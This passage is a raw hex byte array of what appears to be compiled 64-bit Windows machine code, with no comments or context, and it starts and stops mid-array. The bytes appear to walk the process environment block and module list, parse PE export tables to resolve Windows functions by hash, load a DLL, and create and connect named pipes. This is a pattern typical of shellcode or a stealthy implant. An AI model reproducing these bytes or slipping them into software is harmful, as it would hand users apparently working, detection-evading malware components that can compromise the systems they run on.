0x8B,0x40,0x10,0xBA,0xFF,0xFF,0xFF,0xFF,0x48,0x39,0xC2,0x73,0x0D,0x48,0x8B,0x45,0xF8,0xBB,0xFF,0xFF,0xFF,0xFF,0x48,0x89,0x58,0x10,0x48,0x8B,0x45,0xF8,0x48,0x8B,0x40,0x10,0x89,0xC1,0x48,0x8B,0x55,0xE8,0x48,0x8B,0x45,0x20,0x41,0x89,0xC8,0x48,0x89,0xC1,0xE8,0x21,0xEC,0xFF,0xFF,0x85,0xC0,0x75,0x6C,0x48,0x8B,0x45,0xF0,0xBA,0x28,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x7C,0xC7,0xFF,0xFF,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x48,0x83,0x7D,0xE8,0x00,0x74,0x45,0x48,0x8B,0x45,0xF8,0x48,0x8B,0x50,0x10,0x48,0x8B,0x45,0xE8,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x38,0x27,0x00,0x00,0x48,0x8B,0x05,0xD1,0xB8,0x00,0x00,0xFF,0xD0,0x48,0x8B,0x55,0xE8,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0xC9,0xB8,0x00,0x00,0xFF,0xD0,0x48,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0xB8,0x00,0x00,0x00,0x00,0xEB,0x66,0x48,0x83,0x7D,0xE8,0x00,0x74,0x45,0x48,0x8B,0x45,0xF8,0x48,0x8B,0x50,0x10,0x48,0x8B,0x45,0xE8,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0xE5,0x26,0x00,0x00,0x48,0x8B,0x05,0x7E,0xB8,0x00,0x00,0xFF,0xD0,0x48,0x8B,0x55,0xE8,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x76,0xB8,0x00,0x00,0xFF,0xD0,0x48,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0x48,0x8B,0x45,0xF8,0x48,0x8B,0x00,0x48,0x89,0x45,0xF8,0x48,0x83,0x7D,0xF8,0x00,0x0F,0x85,0x7D,0xFE,0xFF,0xFF,0x48,0x8B,0x45,0xF0,0x48,0x83,0xC4,0x78,0x5B,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x30,0x48,0x89,0x4D,0x10,0x48,0x8B,0x45,0x10,0x48,0x89,0xC1,0xE8,0xAF,0xEB,0xFF,0xFF,0x85,0xC0,0x75,0x0A,0xB8,0x00,0x00,0x00,0x00,0xE9,0xC4,0x00,0x00,0x00,0x48,0x8B,0x45,0x10,0x48,0x89,0xC1,0xE8,0x80,0xED,0xFF,0xFF,0x85,0xC0,0x75,0x0A,0xB8,0x00,0x00,0x00,0x00,0xE9,0xAA,0x00,0x00,0x00,0x48,0x8B,0x45,0x10,0x48,0x89,0xC1,0xE8,0x67,0xEE,0xFF,0xFF,0x85,0xC0,0x75,0x0A,0xB8,0x00,0x00,0x00,0x00,0xE9,0x90,0x00,0x00,0x00,0x48,0x8B,0x45,0x10,0x48,0x89,0xC1,0xE8,0xD4,0xF1,0xFF,0xFF,0x48,0x89,0x45,0xF8,0x48,0x83,0x7D,0xF8,0x00,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x72,0x48,0x8B,0x55,0xF8,0x48,0x8B,0x45,0x10,0x48,0x89,0xC1,0xE8,0xB9,0xFB,0xFF,0xFF,0x48,0x89,0x45,0xF0,0x48,0x83,0x7D,0xF0,0x00,0x75,0x20,0x48,0x8B,0x45,0xF8,0xBA,0x20,0x02,0x00,0x00,0x48,0x89,0xC1,0xE8,0x10,0xC6,0xFF,0xFF,0x48,0xC7,0x45,0xF8,0x00,0x00,0x00,0x00,0xB8,0x00,0x00,0x00,0x00,0xEB,0x37,0x48,0x8B,0x45,0xF8,0xBA,0x20,0x02,0x00,0x00,0x48,0x89,0xC1,0xE8,0xF0,0xC5,0xFF,0xFF,0x48,0xC7,0x45,0xF8,0x00,0x00,0x00,0x00,0x48,0x8B,0x45,0xF0,0xBA,0x28,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0xD7,0xC5,0xFF,0xFF,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xB8,0x01,0x00,0x00,0x00,0x48,0x83,0xC4,0x30,0x5D,0xC3,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x30,0x48,0x89,0x4D,0x10,0xC7,0x45,0xDC,0x60,0x00,0x00,0x00,0x8B,0x45,0xDC,0x65,0x48,0x8B,0x00,0x48,0x89,0x45,0xD0,0x48,0x8B,0x45,0xD0,0x48,0x89,0x45,0xF0,0x48,0x8B,0x45,0xF0,0x48,0x8B,0x40,0x18,0x48,0x89,0x45,0xE8,0x48,0x8B,0x45,0xE8,0x48,0x83,0xC0,0x10,0x48,0x89,0x45,0xE0,0x48,0x8B,0x45,0xE8,0x48,0x8B,0x40,0x10,0x48,0x89,0x45,0xF8,0x48,0x8B,0x45,0xF8,0x48,0x8B,0x40,0x30,0x48,0x89,0xC2,0x48,0x8B,0x45,0x10,0x48,0x39,0xD0,0x72,0x2A,0x48,0x8B,0x45,0xF8,0x48,0x8B,0x40,0x30,0x48,0x89,0xC2,0x48,0x8B,0x45,0xF8,0x8B,0x40,0x40,0x89,0xC0,0x48,0x01,0xD0,0x48,0x8B,0x55,0x10,0x48,0x39,0xC2,0x73,0x0A,0x48,0x8B,0x45,0xF8,0x48,0x8B,0x40,0x30,0xEB,0x1A,0x48,0x8B,0x45,0xF8,0x48,0x8B,0x00,0x48,0x89,0x45,0xF8,0x48,0x8B,0x45,0xF8,0x48,0x3B,0x45,0xE0,0x75,0xAD,0xB8,0x00,0x00,0x00,0x00,0x48,0x83,0xC4,0x30,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x20,0x48,0x89,0x4D,0x10,0x48,0x83,0x7D,0x10,0x00,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x6A,0x48,0x8B,0x45,0x10,0x48,0x89,0x45,0xF8,0x48,0x8B,0x45,0xF8,0x0F,0xB7,0x00,0x66,0x3D,0x4D,0x5A,0x74,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x4E,0x48,0x8B,0x45,0xF8,0x8B,0x40,0x3C,0x48,0x63,0xD0,0x48,0x8B,0x45,0x10,0x48,0x01,0xD0,0x48,0x89,0x45,0xF0,0x48,0x8B,0x45,0xF0,0x8B,0x00,0x3D,0x50,0x45,0x00,0x00,0x74,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x25,0x48,0x8B,0x45,0xF0,0x0F,0xB7,0x40,0x16,0x66,0x89,0x45,0xEE,0x0F,0xB7,0x45,0xEE,0x25,0x00,0x20,0x00,0x00,0x85,0xC0,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x05,0xB8,0x01,0x00,0x00,0x00,0x48,0x83,0xC4,0x20,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x60,0x48,0x89,0x4D,0x10,0x89,0x55,0x18,0xC7,0x45,0xD4,0x60,0x00,0x00,0x00,0x8B,0x45,0xD4,0x65,0x48,0x8B,0x00,0x48,0x89,0x45,0xC8,0x48,0x8B,0x45,0xC8,0x48,0x89,0x45,0xF0,0x48,0x8B,0x45,0xF0,0x48,0x8B,0x40,0x18,0x48,0x89,0x45,0xE8,0x48,0x8B,0x45,0xE8,0x48,0x83,0xC0,0x10,0x48,0x89,0x45,0xE0,0x48,0x8B,0x45,0xE8,0x48,0x8B,0x40,0x10,0x48,0x89,0x45,0xF8,0xEB,0x47,0x48,0x8B,0x45,0xF8,0x48,0x8B,0x40,0x30,0x48,0x39,0x45,0x10,0x74,0x2A,0x48,0x8B,0x45,0xF8,0x48,0x8B,0x40,0x30,0x8B,0x55,0x18,0x41,0xB8,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0xAE,0x01,0x00,0x00,0x48,0x89,0x45,0xD8,0x48,0x83,0x7D,0xD8,0x00,0x74,0x09,0x48,0x8B,0x45,0xD8,0xEB,0x1E,0x90,0xEB,0x01,0x90,0x48,0x8B,0x45,0xF8,0x48,0x8B,0x00,0x48,0x89,0x45,0xF8,0x48,0x8B,0x45,0xF8,0x48,0x3B,0x45,0xE0,0x75,0xAF,0xB8,0x00,0x00,0x00,0x00,0x48,0x83,0xC4,0x60,0x5D,0xC3,0x55,0x57,0x48,0x81,0xEC,0x68,0x03,0x00,0x00,0x48,0x8D,0xAC,0x24,0x80,0x00,0x00,0x00,0x48,0x89,0x8D,0x00,0x03,0x00,0x00,0x48,0x89,0x95,0x08,0x03,0x00,0x00,0x48,0x8B,0x85,0x08,0x03,0x00,0x00,0xBA,0x2E,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0xC8,0x23,0x00,0x00,0x48,0x83,0xC0,0x01,0x48,0x89,0x85,0xD8,0x02,0x00,0x00,0x48,0x8B,0x95,0xD8,0x02,0x00,0x00,0x48,0x8B,0x85,0x08,0x03,0x00,0x00,0x48,0x29,0xC2,0x89,0x95,0xD4,0x02,0x00,0x00,0x48,0x8D,0x95,0xB0,0x01,0x00,0x00,0xB8,0x00,0x00,0x00,0x00,0xB9,0x20,0x00,0x00,0x00,0x48,0x89,0xD7,0xF3,0x48,0xAB,0x48,0x89,0xFA,0x89,0x02,0x48,0x83,0xC2,0x04,0x88,0x02,0x48,0x83,0xC2,0x01,0x8B,0x8D,0xD4,0x02,0x00,0x00,0x48,0x8B,0x95,0x08,0x03,0x00,0x00,0x48,0x8D,0x85,0xB0,0x01,0x00,0x00,0x49,0x89,0xC8,0x48,0x89,0xC1,0xE8,0x59,0x23,0x00,0x00,0x48,0x8D,0x85,0xB0,0x01,0x00,0x00,0x48,0x89,0xC1,0xE8,0x3A,0x23,0x00,0x00,0x48,0x89,0xC2,0x48,0x8D,0x85,0xB0,0x01,0x00,0x00,0x48,0x01,0xD0,0xC7,0x00,0x64,0x6C,0x6C,0x00,0x48,0x8D,0x55,0xA0,0xB8,0x00,0x00,0x00,0x00,0xB9,0x41,0x00,0x00,0x00,0x48,0x89,0xD7,0xF3,0x48,0xAB,0x48,0x8D,0x95,0xB0,0x01,0x00,0x00,0x48,0x8D,0x45,0xA0,0x41,0xB8,0x04,0x01,0x00,0x00,0x48,0x89,0xC1,0xE8,0xC2,0x22,0x00,0x00,0x48,0x8D,0x45,0xA0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x5E,0x02,0x00,0x00,0x48,0x89,0x85,0xC8,0x02,0x00,0x00,0x48,0x83,0xBD,0xC8,0x02,0x00,0x00,0x00,0x75,0x30,0x48,0x8B,0x85,0xD8,0x02,0x00,0x00,0x48,0x89,0xC1,0xE8,0x95,0xCE,0xFF,0xFF,0x89,0xC2,0x48,0x8B,0x85,0x00,0x03,0x00,0x00,0x48,0x89,0xC1,0xE8,0x2A,0xFE,0xFF,0xFF,0x48,0x89,0x85,0xC0,0x02,0x00,0x00,0x48,0x8B,0x85,0xC0,0x02,0x00,0x00,0xEB,0x34,0x48,0x8B,0x85,0xD8,0x02,0x00,0x00,0x48,0x89,0xC1,0xE8,0x65,0xCE,0xFF,0xFF,0x89,0xC2,0x48,0x8B,0x85,0xC8,0x02,0x00,0x00,0x41,0xB8,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x18,0x00,0x00,0x00,0x48,0x89,0x85,0xC0,0x02,0x00,0x00,0x48,0x8B,0x85,0xC0,0x02,0x00,0x00,0x48,0x81,0xC4,0x68,0x03,0x00,0x00,0x5F,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xC4,0x80,0x48,0x89,0x4D,0x10,0x89,0x55,0x18,0x44,0x89,0xC0,0x66,0x89,0x45,0x20,0x48,0x8B,0x45,0x10,0x48,0x89,0xC1,0xE8,0x30,0xFD,0xFF,0xFF,0x85,0xC0,0x75,0x0A,0xB8,0x00,0x00,0x00,0x00,0xE9,0xA9,0x01,0x00,0x00,0x48,0x8B,0x45,0x10,0x48,0x89,0x45,0xE8,0x48,0x8B,0x45,0xE8,0x8B,0x40,0x3C,0x48,0x63,0xD0,0x48,0x8B,0x45,0x10,0x48,0x01,0xD0,0x48,0x89,0x45,0xE0,0x48,0x8B,0x45,0xE0,0x48,0x05,0x88,0x00,0x00,0x00,0x48,0x89,0x45,0xD8,0x48,0x8B,0x45,0xD8,0x8B,0x40,0x04,0x85,0xC0,0x74,0x0A,0x48,0x8B,0x45,0xD8,0x8B,0x00,0x85,0xC0,0x75,0x0A,0xB8,0x00,0x00,0x00,0x00,0xE9,0x5F,0x01,0x00,0x00,0x48,0x8B,0x45,0xD8,0x8B,0x00,0x89,0xC2,0x48,0x8B,0x45,0x10,0x48,0x01,0xD0,0x48,0x89,0x45,0xD0,0x48,0x8B,0x45,0xD8,0x8B,0x40,0x04,0x89,0x45,0xCC,0x48,0x8B,0x45,0xD0,0x8B,0x40,0x1C,0x89,0xC2,0x48,0x8B,0x45,0x10,0x48,0x01,0xD0,0x48,0x89,0x45,0xC0,0x48,0x8B,0x45,0xD0,0x8B,0x40,0x20,0x89,0xC2,0x48,0x8B,0x45,0x10,0x48,0x01,0xD0,0x48,0x89,0x45,0xB8,0x48,0x8B,0x45,0xD0,0x8B,0x40,0x24,0x89,0xC2,0x48,0x8B,0x45,0x10,0x48,0x01,0xD0,0x48,0x89,0x45,0xB0,0x48,0xC7,0x45,0xF8,0x00,0x00,0x00,0x00,0x83,0x7D,0x18,0x00,0x0F,0x84,0x81,0x00,0x00,0x00,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0xEB,0x6A,0x8B,0x45,0xF4,0x48,0x8D,0x14,0x85,0x00,0x00,0x00,0x00,0x48,0x8B,0x45,0xB8,0x48,0x01,0xD0,0x8B,0x00,0x89,0xC2,0x48,0x8B,0x45,0x10,0x48,0x01,0xD0,0x48,0x89,0x45,0xA8,0x48,0x8B,0x45,0xA8,0x48,0x89,0xC1,0xE8,0x1B,0xCD,0xFF,0xFF,0x39,0x45,0x18,0x75,0x34,0x8B,0x45,0xF4,0x48,0x8D,0x14,0x00,0x48,0x8B,0x45,0xB0,0x48,0x01,0xD0,0x0F,0xB7,0x00,0x0F,0xB7,0xC0,0x48,0x8D,0x14,0x85,0x00,0x00,0x00,0x00,0x48,0x8B,0x45,0xC0,0x48,0x01,0xD0,0x8B,0x00,0x89,0xC2,0x48,0x8B,0x45,0x10,0x48,0x01,0xD0,0x48,0x89,0x45,0xF8,0xEB,0x3F,0x83,0x45,0xF4,0x01,0x48,0x8B,0x45,0xD0,0x8B,0x40,0x18,0x39,0x45,0xF4,0x72,0x8A,0xEB,0x2D,0x0F,0xB7,0x55,0x20,0x48,0x8B,0x45,0xD0,0x8B,0x40,0x10,0x29,0xC2,0x89,0xD0,0x48,0x8D,0x14,0x85,0x00,0x00,0x00,0x00,0x48,0x8B,0x45,0xC0,0x48,0x01,0xD0,0x8B,0x00,0x89,0xC2,0x48,0x8B,0x45,0x10,0x48,0x01,0xD0,0x48,0x89,0x45,0xF8,0x48,0x83,0x7D,0xF8,0x00,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x38,0x48,0x8B,0x55,0xF8,0x48,0x8B,0x45,0xD0,0x48,0x39,0xC2,0x72,0x27,0x8B,0x55,0xCC,0x48,0x8B,0x45,0xD0,0x48,0x01,0xD0,0x48,0x8B,0x55,0xF8,0x48,0x39,0xC2,0x73,0x14,0x48,0x8B,0x55,0xF8,0x48,0x8B,0x45,0x10,0x48,0x89,0xC1,0xE8,0xB6,0xFC,0xFF,0xFF,0x48,0x89,0x45,0xF8,0x48,0x8B,0x45,0xF8,0x48,0x83,0xEC,0x80,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xC4,0x80,0x48,0x89,0x4D,0x10,0x89,0x55,0x18,0xC7,0x45,0xC8,0x60,0x00,0x00,0x00,0x8B,0x45,0xC8,0x65,0x48,0x8B,0x00,0x48,0x89,0x45,0xC0,0x48,0x8B,0x45,0xC0,0x48,0x89,0x45,0xF0,0x48,0x8B,0x45,0xF0,0x48,0x8B,0x40,0x18,0x48,0x89,0x45,0xE8,0x48,0x8B,0x45,0xE8,0x48,0x83,0xC0,0x10,0x48,0x89,0x45,0xE0,0x48,0x8B,0x45,0xE8,0x48,0x8B,0x40,0x10,0x48,0x89,0x45,0xF8,0x48,0x8B,0x45,0x10,0xBA,0x5C,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x6D,0x20,0x00,0x00,0x48,0x85,0xC0,0x0F,0x95,0xC0,0x0F,0xB6,0xC0,0x89,0x45,0xDC,0x83,0x7D,0xDC,0x00,0x74,0x29,0x48,0x8B,0x45,0xF8,0x48,0x8B,0x50,0x50,0x48,0x8B,0x45,0x10,0x48,0x89,0xC1,0x48,0x8B,0x05,0x05,0xB2,0x00,0x00,0xFF,0xD0,0x85,0xC0,0x75,0x36,0x48,0x8B,0x45,0xF8,0x48,0x8B,0x40,0x30,0xE9,0x03,0x01,0x00,0x00,0x48,0x8B,0x45,0xF8,0x48,0x8B,0x50,0x60,0x48,0x8B,0x45,0x10,0x48,0x89,0xC1,0x48,0x8B,0x05,0xDC,0xB1,0x00,0x00,0xFF,0xD0,0x85,0xC0,0x75,0x0D,0x48,0x8B,0x45,0xF8,0x48,0x8B,0x40,0x30,0xE9,0xDA,0x00,0x00,0x00,0x48,0x8B,0x45,0xF8,0x48,0x8B,0x00,0x48,0x89,0x45,0xF8,0x48,0x8B,0x45,0xF8,0x48,0x3B,0x45,0xE0,0x75,0x93,0x83,0x7D,0x18,0x00,0x75,0x0A,0xB8,0x00,0x00,0x00,0x00,0xE9,0xB5,0x00,0x00,0x00,0xBA,0x00,0x00,0x00,0x00,0x48,0x8D,0x05,0x58,0x41,0x00,0x00,0x48,0x89,0xC1,0xE8,0x05,0xFF,0xFF,0xFF,0x41,0xB8,0x00,0x00,0x00,0x00,0xBA,0xDA,0xEC,0x01,0xA3,0x48,0x89,0xC1,0xE8,0x13,0xFD,0xFF,0xFF,0x48,0x89,0x45,0xD0,0x48,0x83,0x7D,0xD0,0x00,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x7C,0x48,0xC7,0x45,0xB0,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xB8,0x00,0x00,0x00,0x00,0x48,0x8B,0x45,0x10,0x48,0x89,0x45,0xB8,0x48,0x8B,0x45,0xB8,0xBA,0x04,0x01,0x00,0x00,0x48,0x89,0xC1,0xE8,0xE2,0x1C,0x00,0x00,0x66,0x89,0x45,0xB0,0x0F,0xB7,0x45,0xB0,0x01,0xC0,0x66,0x89,0x45,0xB0,0x0F,0xB7,0x45,0xB0,0x83,0xC0,0x02,0x66,0x89,0x45,0xB2,0x48,0xC7,0x45,0xA8,0x00,0x00,0x00,0x00,0x48,0x8D,0x4D,0xA8,0x48,0x8D,0x55,0xB0,0x48,0x8B,0x45,0xD0,0x49,0x89,0xC9,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0xB9,0x00,0x00,0x00,0x00,0xFF,0xD0,0x89,0x45,0xCC,0x83,0x7D,0xCC,0x00,0x79,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x04,0x48,0x8B,0x45,0xA8,0x48,0x83,0xEC,0x80,0x5D,0xC3,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x55,0x48,0x89,0xE5,0x48,0x81,0xEC,0xC0,0x00,0x00,0x00,0x48,0x89,0x4D,0x10,0x89,0x55,0x18,0x4C,0x89,0x45,0x20,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0xC7,0x45,0xEC,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x66,0x0F,0xEF,0xC0,0x0F,0x11,0x45,0xA0,0x0F,0x11,0x45,0xB0,0x66,0x0F,0xD6,0x45,0xC0,0x66,0x0F,0xEF,0xC0,0x0F,0x11,0x45,0x80,0x66,0x0F,0xD6,0x45,0x90,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0xC7,0x45,0xE4,0x00,0x00,0x00,0x00,0xC7,0x45,0xE0,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xD8,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xD0,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xC8,0x00,0x00,0x00,0x00,0xBA,0x01,0x00,0x00,0x00,0x48,0x8D,0x05,0x3D,0x40,0x00,0x00,0x48,0x89,0xC1,0xE8,0xCA,0xFD,0xFF,0xFF,0x41,0xB8,0x00,0x00,0x00,0x00,0xBA,0x1D,0x21,0x88,0x03,0x48,0x89,0xC1,0xE8,0xD8,0xFB,0xFF,0xFF,0x48,0x89,0x45,0xD8,0x48,0x83,0x7D,0xD8,0x00,0x0F,0x84,0x84,0x01,0x00,0x00,0xBA,0x01,0x00,0x00,0x00,0x48,0x8D,0x05,0x07,0x40,0x00,0x00,0x48,0x89,0xC1,0xE8,0x94,0xFD,0xFF,0xFF,0x41,0xB8,0x00,0x00,0x00,0x00,0xBA,0x86,0xE8,0x93,0x16,0x48,0x89,0xC1,0xE8,0xA2,0xFB,0xFF,0xFF,0x48,0x89,0x45,0xD0,0x48,0x83,0x7D,0xD0,0x00,0x0F,0x84,0x51,0x01,0x00,0x00,0xBA,0x01,0x00,0x00,0x00,0x48,0x8D,0x05,0xEB,0x3F,0x00,0x00,0x48,0x89,0xC1,0xE8,0x5E,0xFD,0xFF,0xFF,0x41,0xB8,0x00,0x00,0x00,0x00,0xBA,0x44,0x3B,0x99,0x58,0x48,0x89,0xC1,0xE8,0x6C,0xFB,0xFF,0xFF,0x48,0x89,0x45,0xC8,0x48,0x83,0x7D,0xC8,0x00,0x0F,0x84,0x1E,0x01,0x00,0x00,0x48,0x8B,0x05,0x40,0xAF,0x00,0x00,0xFF,0xD0,0x41,0xB8,0x0A,0x02,0x00,0x00,0xBA,0x08,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x31,0xAF,0x00,0x00,0xFF,0xD0,0x48,0x89,0x45,0xF0,0x48,0x83,0x7D,0xF0,0x00,0x0F,0x84,0xF2,0x00,0x00,0x00,0x48,0x8D,0x45,0xA0,0x4C,0x8B,0x45,0xD8,0xBA,0x01,0x00,0x00,0x00,0x48,0x89,0xC1,0x41,0xFF,0xD0,0x89,0x45,0xEC,0x83,0x7D,0xEC,0x00,0x0F,0x84,0xD5,0x00,0x00,0x00,0x48,0x8D,0x45,0x80,0x48,0x8D,0x50,0x08,0x48,0x8B,0x45,0xD0,0x41,0xB9,0x00,0x00,0x00,0x00,0x49,0x89,0xD0,0xBA,0x01,0x00,0x00,0x00,0x48,0x8D,0x0D,0x6F,0x3F,0x00,0x00,0xFF,0xD0,0x89,0x45,0xEC,0x83,0x7D,0xEC,0x00,0x0F,0x84,0xA8,0x00,0x00,0x00,0x48,0x8B,0x55,0x10,0x48,0x8B,0x45,0xF0,0x49,0x89,0xD1,0x4C,0x8D,0x05,0x74,0x3F,0x00,0x00,0xBA,0x04,0x01,0x00,0x00,0x48,0x89,0xC1,0xE8,0x49,0x1D,0x00,0x00,0x83,0x7D,0x18,0x00,0x74,0x07,0xB8,0x03,0x00,0x00,0x40,0xEB,0x05,0xB8,0x03,0x00,0x00,0x00,0x89,0x45,0xE8,0xC7,0x45,0xE4,0x00,0x00,0x00,0x00,0xC7,0x45,0xE0,0xFF,0x00,0x00,0x00,0x44,0x8B,0x4D,0xE0,0x44,0x8B,0x45,0xE4,0x8B,0x55,0xE8,0x48,0x8B,0x45,0xF0,0x48,0x8D,0x4D,0x80,0x48,0x89,0x4C,0x24,0x38,0xC7,0x44,0x24,0x30,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x28,0x00,0x10,0x00,0x00,0xC7,0x44,0x24,0x20,0x00,0x10,0x00,0x00,0x4C,0x8B,0x55,0xC8,0x48,0x89,0xC1,0x41,0xFF,0xD2,0x48,0x8B,0x55,0x20,0x48,0x89,0x02,0x48,0x8B,0x45,0x20,0x48,0x8B,0x00,0x48,0x83,0xF8,0xFF,0x74,0x1B,0xC7,0x45,0xFC,0x01,0x00,0x00,0x00,0xEB,0x13,0x90,0xEB,0x10,0x90,0xEB,0x0D,0x90,0xEB,0x0A,0x90,0xEB,0x07,0x90,0xEB,0x04,0x90,0xEB,0x01,0x90,0x48,0x83,0x7D,0xF0,0x00,0x74,0x21,0x48,0x8B,0x05,0x0E,0xAE,0x00,0x00,0xFF,0xD0,0x48,0x8B,0x55,0xF0,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x06,0xAE,0x00,0x00,0xFF,0xD0,0x8B,0x45,0xFC,0x48,0x81,0xC4,0xC0,0x00,0x00,0x00,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x60,0x48,0x89,0x4D,0x10,0x48,0x89,0x55,0x18,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0xBA,0x01,0x00,0x00,0x00,0x48,0x8D,0x05,0x2F,0x3E,0x00,0x00,0x48,0x89,0xC1,0xE8,0xA2,0xFB,0xFF,0xFF,0x41,0xB8,0x00,0x00,0x00,0x00,0xBA,0xA4,0x6E,0x97,0x24,0x48,0x89,0xC1,0xE8,0xB0,0xF9,0xFF,0xFF,0x48,0x89,0x45,0xE8,0x48,0x83,0x7D,0xE8,0x00,0x0F,0x84,0x9F,0x00,0x00,0x00,0x48,0x8B,0x05,0x84,0xAD,0x00,0x00,0xFF,0xD0,0x41,0xB8,0x0A,0x02,0x00,0x00,0xBA,0x08,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x75,0xAD,0x00,0x00,0xFF,0xD0,0x48,0x89,0x45,0xF0,0x48,0x83,0x7D,0xF0,0x00,0x74,0x77,0x48,0x8B,0x55,0x10,0x48,0x8B,0x45,0xF0,0x49,0x89,0xD1,0x4C,0x8D,0x05,0x0C,0x3E,0x00,0x00,0xBA,0x04,0x01,0x00,0x00,0x48,0x89,0xC1,0xE8,0xE1,0x1B,0x00,0x00,0x48,0x8B,0x45,0xF0,0x48,0xC7,0x44,0x24,0x30,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x28,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x20,0x03,0x00,0x00,0x00,0x4C,0x8B,0x55,0xE8,0x41,0xB9,0x00,0x00,0x00,0x00,0x41,0xB8,0x00,0x00,0x00,0x00,0xBA,0x00,0x00,0x00,0xC0,0x48,0x89,0xC1,0x41,0xFF,0xD2,0x48,0x8B,0x55,0x18,0x48,0x89,0x02,0x48,0x8B,0x45,0x18,0x48,0x8B,0x00,0x48,0x83,0xF8,0xFF,0x74,0x0F,0xC7,0x45,0xFC,0x01,0x00,0x00,0x00,0xEB,0x07,0x90,0xEB,0x04,0x90,0xEB,0x01,0x90,0x48,0x83,0x7D,0xF0,0x00,0x74,0x21,0x48,0x8B,0x05,0xD7,0xAC,0x00,0x00,0xFF,0xD0,0x48,0x8B,0x55,0xF0,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0xCF,0xAC,0x00,0x00,0xFF,0xD0,0x8B,0x45,0xFC,0x48,0x83,0xC4,0x60,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x30,0x48,0x89,0x4D,0x10,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0xC7,0x45,0xF8,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xBA,0x01,0x00,0x00,0x00,0x48,0x8D,0x05,0x00,0x3D,0x00,0x00,0x48,0x89,0xC1,0xE8,0x73,0xFA,0xFF,0xFF,0x41,0xB8,0x00,0x00,0x00,0x00,0xBA,0x66,0x94,0x01,0x96,0x48,0x89,0xC1,0xE8,0x81,0xF8,0xFF,0xFF,0x48,0x89,0x45,0xF0,0x48,0x83,0x7D,0xF0,0x00,0x74,0x35,0x48,0x8B,0x45,0x10,0x4C,0x8B,0x45,0xF0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x41,0xFF,0xD0,0x89,0x45,0xF8,0x83,0x7D,0xF8,0x00,0x75,0x10,0x48,0x8B,0x05,0x35,0xAC,0x00,0x00,0xFF,0xD0,0x3D,0x17,0x02,0x00,0x00,0x75,0x0C,0xC7,0x45,0xFC,0x01,0x00,0x00,0x00,0xEB,0x04,0x90,0xEB,0x01,0x90,0x8B,0x45,0xFC,0x48,0x83,0xC4,0x30,0x5D,0xC3,0x55,0x53,0x48,0x83,0xEC,0x58,0x48,0x8D,0x6C,0x24,0x50,0x48,0x89,0x4D,0x20,0x48,0x89,0x55,0x28,0x4C,0x89,0x45,0x30,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0xC7,0x45,0xF8,0x00,0x00,0x00,0x00,0xC7,0x45,0xEC,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xBA,0x01,0x00,0x00,0x00,0x48,0x8D,0x05,0x58,0x3C,0x00,0